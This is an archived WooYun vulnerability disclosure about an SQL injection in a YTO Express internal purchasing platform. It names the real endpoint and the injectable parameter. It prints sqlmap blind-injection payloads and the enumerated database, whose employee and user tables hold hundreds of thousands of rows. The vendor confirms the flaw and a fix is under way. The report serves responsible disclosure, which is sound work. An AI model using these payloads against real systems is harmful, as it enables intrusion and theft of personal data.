乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-03: 细节已通知厂商并且等待厂商处理中 2015-11-03: 厂商已经确认,细节仅向厂商公开 2015-11-13: 细节向核心白帽子及相关领域专家公开 2015-11-23: 细节向普通白帽子公开 2015-12-03: 细节向实习白帽子公开 2015-12-18: 细节向公众公开
圆通某系统SQL注入漏洞
圆通内部申购平台注入点:
http://mall.yto.net.cn/mall/searchGoods.actiongoodsName=-1参数POST注入
Place: POSTParameter: goodsName Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: goodsName=-1'||(SELECT 'hkIe' FROM DUAL WHERE 8815=8815 RLIKE (SELECT (CASE WHEN (2662=2662) THEN 0x2d31 ELSE 0x28 END)))||' Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: goodsName=-1'||(SELECT 'AqoF' FROM DUAL WHERE 3666=3666 AND SLEEP(5))||'---web application technology: JSPback-end DBMS: MySQL 5.0.11Database: ytoshop[37 tables]+--------------------------+| t_mall_advert || t_mall_cart || t_mall_category || t_mall_comment || t_mall_dict || t_mall_goods || t_mall_image || t_mall_indent || t_mall_inner_dispose || t_mall_notice || t_mall_order || t_mall_order_detail || t_mall_org || t_mall_reply || t_mall_response_category || t_mall_user || t_mall_user_address || t_mall_userinfo || t_mdm_employee || t_orm_app || t_orm_button || t_orm_change_log || t_orm_function || t_orm_mac || t_orm_mac_function || t_orm_mac_user || t_orm_menu || t_orm_org || t_orm_role || t_orm_role_func || t_orm_role_gui_func || t_orm_system || t_orm_user || t_orm_user_role || yto_department || yto_employee_work || yto_jingang_station |+--------------------------+Database: ytoshop+--------------------------+---------+| Table | Entries |+--------------------------+---------+| yto_employee_work | 459626 || t_orm_user | 401178 || yto_department | 126400 || yto_jingang_station | 19202 || t_mall_order_detail | 14962 || t_mall_cart | 9945 || t_mall_order | 8961 || t_orm_mac | 7628 || t_mall_userinfo | 4163 || t_orm_org | 3951 || t_mall_user_address | 2602 || t_orm_role | 1089 || t_orm_role_func | 359 || t_mall_inner_dispose | 232 || t_orm_function | 156 || t_orm_menu | 140 || t_mall_response_category | 30 || t_orm_app | 18 || t_orm_button | 12 || t_orm_user_role | 11 || t_mall_dict | 10 || t_mall_goods | 9 || t_orm_system | 8 || t_mall_category | 5 || t_mall_advert | 4 || t_mall_image | 4 || t_mall_comment | 3 || t_orm_mac_function | 3 || t_mall_notice | 2 |+--------------------------+---------+
参数检查过滤
危害等级:中
漏洞Rank:5
确认时间:2015-11-03 15:27
谢谢白帽子,已经开始修了。
暂无